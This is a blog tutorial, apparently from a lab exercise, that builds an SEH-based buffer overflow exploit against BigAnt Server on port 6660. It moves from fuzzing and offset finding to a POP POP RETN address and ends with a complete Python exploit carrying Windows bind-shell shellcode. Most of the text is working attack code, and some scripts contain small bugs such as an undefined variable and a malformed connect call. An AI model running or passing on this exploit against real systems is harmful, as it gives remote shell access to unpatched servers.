Daftar Blog Saya

Jumat, 17 Februari 2012

Exploit BigAnt Server

Thesse local server aplication has opening port number 6660. we will try attack from USV.






Make fuzzer

#!/usr/bin/pyton
import socket
buffer = "USV "+ "\x41" * 2500 + "\r\n\r\n"
sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect(("192.168.56.101",6660))
sock.send(buffer)
sock.close()

run BigAnt server than attach to Ollydbg. we will try to send 2500 buffer to the server with fuzzer, and see what happend


the aplication got crash but the EIP is not overwrite by buffer which we send, because it has SEH handling went overflow happend. we can check it by click on view --> SEH Cain.



to send buffer to the stack we can press shift+f9 then it can pass seh handler.



Get POP POP RETN
we need to get POP POP RETN address to overwrite SEH address in the application. so we will use "view" then "executable module"



we can see POP POP RETN and inside of module with using Ollydbg from Olly dbg click view the executable module and double click to the file vbajet32.dll. after we got inside to windows CPU of vbajet32.dll file right click searchfor than sequece of command and than filled it with POP r32, POP r32 and RETN -->Find. then we will get address in memory of vbajet32.dll



create pattern offset
to get how many byte stuck SEH, we use pattern create on metasploit. reload the character from pattern create to the buffer.

root@bt:/pentest/exploits/framework/tools# ./pattern_create.rb 2500 > Big.txt

#!/usr/bin/pyton
import socket
buffer = "USV "
buffer+= "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2D" + "\r\n\r\n"
sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect(("192.168.56.101",6660))
sock.send(buffer)
sock.close()

restart the Ollydbg and BigAnt server then run it again with new fuzzer, to by pass fuzzer press shift+f9. to count a number buffer we can use pattern offset.



root@bt:/pentest/exploits/framework/tools# ./pattern_offset.rb 42326742
966

now we have buffer about 966 byte to trigger SEH handle then we will put in to the fuzzer

#!/usr/bin/python
import socket

buffer ="USV "
buffer+= "\x90" * 962
buffer+= "\xcc\xcc\xcc\xcc"
buffer+= "\x41\x41\x41\x41"
buffer+= "\x90" * (2504 - len(hancur))
buffer+= "\r\n\r\n"

sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(("192.168.56.101",6660))
sock.send(buffer)
sock.close()

after that restart Ollydbg and BigAnt server, then run it with the fuzzer. BigAnt server will crash and buffer \x41 will overwrite SEH handler.




Controling CPU proses
After we get byte address as trigger of SEH now, we loaded offset address from vbajet32.dll which consist POP POP RETN to the fuzzer

#!/usr/bin/python
import socket

buffer = "USV "
buffer+= "\x90" * 962
buffer+= "\xcc\xcc\xcc\xcc"
buffer+= "\x6A\x19\x9A\x0F"
buffer+= "\x90" * (2504 - len(buffer))
buffer+= "\r\n\r\n"

sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(("192.168.56.101".6660))
sock.send(buffer)
sock.close()

before we run BIgAnt server we need to have breakpoint on SEH memory address to make sure if our exploit really pointed to the right target. then running with fuzzer.

press shift+f9 to continue the process of memory vbajet32.dll and f7 to get RETN

but we have problem now, memory space just about 4 byte, it is'nt enough to keep a shell code. show we need to relocated to the address which has bigger space. right click on 015FFD7C then "follow in dump " then "selection"



Generated Shell code
we wil use

root@bt:/pentest/exploits/framework2# ./msfweb
+----=[ Metasploit Framework Web Interface (127.0.0.1:55555)

then opened in the browser


i will use windows bind shell to generated shell code


then will reload the shell cod eto the fuzzer without the bad character. we must check the shell code, do not have any bad character. so we check it manualy with send the fuzzer row by row. after the shellcode is clear from bad character the finally fuzzer is like this.....

 #!/usr/bin/python
import socket

buffer = "USV "
buffer+= "\x90" * 962
buffer+= "\xeb\x06\x90\x90"
buffer+= "\x6A\x19\x9A\x0F"
buffer+= "\x90" * 32
buffer+= ("\xdd\xc5\xb8\x4a\x27\x71\x35\x33\xc9\xb1\x51\xd9\x74\x24\xf4\x5e"
"\x83\xc6\x04\x31\x46\x13\x03\x0c\x34\x93\xc0\x6c\x50\xb8\x66\x64"
"\x5c\xc1\x86\x8b\xff\xb5\x15\x57\x24\x41\xa0\xab\xaf\x29\x2e\xab"
"\xae\x3e\xbb\x04\xa9\x4b\xe3\xba\xc8\xa0\x55\x31\xfe\xbd\x67\xab"
"\xce\x01\xfe\x9f\xb5\x42\x75\xd8\x74\x88\x7b\xe7\xb4\xe6\x70\xdc"
"\x6c\xdd\x50\x57\x68\x96\xfe\xb3\x73\x42\x66\x30\x7f\xdf\xec\x19"
"\x9c\xde\x19\xa6\xb0\x6b\x54\xc4\xec\x77\x06\xd7\xdc\x5c\xac\x5c"
"\x5d\x53\xa6\x22\x6e\x18\xc8\xbe\xc3\x95\x69\xb6\x45\xc2\xe7\x88"
"\x77\xfe\xa8\xeb\x5e\x98\x1b\x75\x37\x56\xae\x11\xb0\xeb\xfc\xbe"
"\x6a\xf3\xd1\x28\x58\xe6\x2e\x93\x0e\x06\x18\xbc\x27\x1d\xc3\xc3"
"\xd5\xd6\x0e\x96\x4f\xe5\xf1\xc8\xf8\x30\x04\x1d\x55\x95\xe8\x0b"
"\xf5\x49\x44\xe0\xa9\x2e\x39\x45\x1d\x4e\x6d\x2f\xc9\xa1\xd2\xc9"
"\x5a\x4b\x0b\x80\x35\xef\xd6\xda\x02\xb8\x19\xcc\xe7\x57\xb7\xa5"
"\x08\x87\x5f\xe1\x5a\x06\x49\xbe\x5b\x81\xda\x15\x5b\xfe\xb5\x70"
"\xea\x79\x0c\x2d\x12\x53\xdf\x85\xb8\x09\x1f\xf5\xd2\xda\x38\x8c"
"\x12\x63\x90\x91\x4d\xc1\xe1\xbd\x14\x80\x79\x5b\xb1\x37\xef\x2a"
"\xa4\xd2\xbf\x75\x0e\xef\xc9\x62\x3a\xab\x40\x8e\x8a\xf3\xa0\xe4"
"\x13\xb1\x6b\x06\xa9\x1a\xe7\x7b\x54\x5b\xac\x28\x02\xf3\xc0\xd0"
"\xe6\x12\xda\x59\x4d\xe4\xf2\xfa\x1a\x48\xaa\xad\xf5\x06\x4d\x1c"
"\xa7\x83\x1c\x61\x97\x44\x32\x44\x1d\x5b\x1f\x89\xc8\x09\x5f\x8a"
"\xc2\x32\x4f\xff\x7a\x31\xf3\x3b\xe0\x36\x22\x91\x16\x18\xa3\xe5"
"\x63\x9d\x6b\x56\x8b\x48\x6c\x88")
buffer+= "\x90" * (2504 - len(buffer))
buffer+= "\r\n\r\n"

sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(("192.168.56.101",6660))
sock.send(buffer)
sock.close()

runing the payload
to run the payload open BigAnt server than run it, after that from telnet we send the fuzzer ang connecting the telnet


Tidak ada komentar:

Posting Komentar